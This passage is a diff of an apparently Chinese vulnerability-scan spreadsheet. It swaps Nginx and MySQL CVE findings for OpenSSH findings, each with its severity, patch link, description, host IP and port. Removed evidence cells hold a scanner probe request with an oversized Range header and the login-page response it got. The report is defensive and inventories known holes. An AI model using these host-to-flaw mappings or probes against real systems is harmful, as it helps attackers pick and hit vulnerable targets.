&gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X23" t="inlineStr">
@@ -3722,7 +3090,7 @@
     <row r="24">
       <c r="A24" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>OpenSSH xauth命令注入漏洞(CVE-2016-3115)</t>
         </is>
       </c>
       <c r="B24" t="inlineStr">
@@ -3732,18 +3100,23 @@
       </c>
       <c r="C24" t="inlineStr">
         <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D24" t="inlineStr"/>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D24" t="inlineStr">
+        <is>
+          <t>命令执行</t>
+        </is>
+      </c>
       <c r="E24" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://www.openssh.com/txt/x11fwd.adv</t>
         </is>
       </c>
       <c r="F24" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.2p1及之前版本的sshd中的session.c文件中存在CRLF注入漏洞。远程攻击者可借助特制的X11转发数据利用该漏洞绕过既定的shell-command限制。</t>
         </is>
       </c>
       <c r="G24" t="inlineStr">
@@ -3753,37 +3126,37 @@
       </c>
       <c r="H24" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I24" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J24" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2016-3115</t>
         </is>
       </c>
       <c r="K24" t="inlineStr">
         <is>
-          <t>2026-07-14 09:23</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L24" t="inlineStr">
         <is>
-          <t>2026-07-14 09:22</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M24" t="inlineStr">
         <is>
-          <t>192.168.66.176</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N24" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O24" t="inlineStr">
@@ -3805,7 +3178,7 @@
       </c>
       <c r="T24" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U24" t="inlineStr"/>
@@ -3816,29 +3189,7 @@
       </c>
       <c r="W24" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X24" t="inlineStr">
@@ -3855,7 +3206,7 @@
     <row r="25">
       <c r="A25" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>OpenSSH sshd monitor.c文件权限许可和访问控制漏洞(CVE-2015-6564)</t>
         </is>
       </c>
       <c r="B25" t="inlineStr">
@@ -3868,15 +3219,19 @@
           <t>中危</t>
         </is>
       </c>
-      <c r="D25" t="inlineStr"/>
+      <c r="D25" t="inlineStr">
+        <is>
+          <t>访问控制错误</t>
+        </is>
+      </c>
       <c r="E25" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F25" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>基于non-OpenBSD平台的OpenSSH 7.0之前版本的sshd中的monitor.c文件中的‘mm_answer_pam_free_ctx’函数存在释放后重用漏洞。本地攻击者可通过控制sshd uid发送错误的MONITOR_REQ_PAM_FREE_CTX请求利用该漏洞获取权限。</t>
         </is>
       </c>
       <c r="G25" t="inlineStr">
@@ -3886,37 +3241,37 @@
       </c>
       <c r="H25" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I25" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J25" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2015-6564</t>
         </is>
       </c>
       <c r="K25" t="inlineStr">
         <is>
-          <t>2026-07-14 09:23</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L25" t="inlineStr">
         <is>
-          <t>2026-07-14 09:22</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M25" t="inlineStr">
         <is>
-          <t>192.168.66.176</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N25" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O25" t="inlineStr">
@@ -3938,7 +3293,7 @@
       </c>
       <c r="T25" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U25" t="inlineStr"/>
@@ -3949,29 +3304,7 @@
       </c>
       <c r="W25" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X25" t="inlineStr">
@@ -3988,7 +3321,7 @@
     <row r="26">
       <c r="A26" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>OpenSSH信息泄露漏洞(CVE-2020-14145)</t>
         </is>
       </c>
       <c r="B26" t="inlineStr">
@@ -4001,15 +3334,20 @@
           <t>中危</t>
         </is>
       </c>
-      <c r="D26" t="inlineStr"/>
+      <c r="D26" t="inlineStr">
+        <is>
+          <t>信息泄露</t>
+        </is>
+      </c>
       <c r="E26" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：
+https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F26" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 5.7版本至8.4版本的客户端中存在信息泄露漏洞。攻击者可利用该漏洞获取信息。</t>
         </is>
       </c>
       <c r="G26" t="inlineStr">
@@ -4019,37 +3357,37 @@
       </c>
       <c r="H26" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I26" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J26" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2020-14145</t>
         </is>
       </c>
       <c r="K26" t="inlineStr">
         <is>
-          <t>2026-07-14 09:11</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L26" t="inlineStr">
         <is>
-          <t>2026-07-14 09:11</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M26" t="inlineStr">
         <is>
-          <t>192.168.50.190</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N26" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O26" t="inlineStr">
@@ -4071,7 +3409,7 @@
       </c>
       <c r="T26" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U26" t="inlineStr"/>
@@ -4082,29 +3420,7 @@
       </c>
       <c r="W26" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X26" t="inlineStr">
@@ -4121,28 +3437,33 @@
     <row r="27">
       <c r="A27" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>OpenSSH 授权问题漏洞(CVE-2021-36368)</t>
         </is>
       </c>
       <c r="B27" t="inlineStr">
         <is>
-          <t>尽快修复</t>
+          <t>建议修复</t>
         </is>
       </c>
       <c r="C27" t="inlineStr">
         <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D27" t="inlineStr"/>
+          <t>低危</t>
+        </is>
+      </c>
+      <c r="D27" t="inlineStr">
+        <is>
+          <t>授权问题</t>
+        </is>
+      </c>
       <c r="E27" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： ", "https://www.openssh.com/security.html</t>
         </is>
       </c>
       <c r="F27" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 
+OpenSSH 8.9 之前的版本中存在安全漏洞。该漏洞源于客户端使用带代理转发但没有 -oLogLevel=verbose 的公钥身份验证。</t>
         </is>
       </c>
       <c r="G27" t="inlineStr">
@@ -4152,37 +3473,37 @@
       </c>
       <c r="H27" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I27" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J27" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2021-36368</t>
         </is>
       </c>
       <c r="K27" t="inlineStr">
         <is>
-          <t>2026-07-14 09:11</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L27" t="inlineStr">
         <is>
-          <t>2026-07-14 09:11</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M27" t="inlineStr">
         <is>
-          <t>192.168.50.190</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N27" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O27" t="inlineStr">
@@ -4204,7 +3525,7 @@
       </c>
       <c r="T27" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U27" t="inlineStr"/>
@@ -4215,29 +3536,7 @@
       </c>
       <c r="W27" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X27" t="inlineStr">
@@ -4254,7 +3553,7 @@
     <row r="28">
       <c r="A28" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>OpenSSH 访问限制绕过漏洞(CVE-2018-20685)</t>
         </is>
       </c>
       <c r="B28" t="inlineStr">
@@ -4264,18 +3563,22 @@
       </c>
       <c r="C28" t="inlineStr">
         <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D28" t="inlineStr"/>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D28" t="inlineStr">
+        <is>
+          <t>越权访问</t>
+        </is>
+      </c>
       <c r="E28" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://www.openssh.com/</t>
         </is>
       </c>
       <c r="F28" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。scp Client是其中的一个SCP客户端。OpenSSH 7.9版本中的scp客户端的scp.c文件存在安全漏洞。远程攻击者可借助.文件名或空文件名利用该漏洞造成SSH服务器绕过访问限制。</t>
         </is>
       </c>
       <c r="G28" t="inlineStr">
@@ -4285,37 +3588,37 @@
       </c>
       <c r="H28" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I28" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J28" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2018-20685</t>
         </is>
       </c>
       <c r="K28" t="inlineStr">
         <is>
-          <t>2026-07-14 09:11</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L28" t="inlineStr">
         <is>
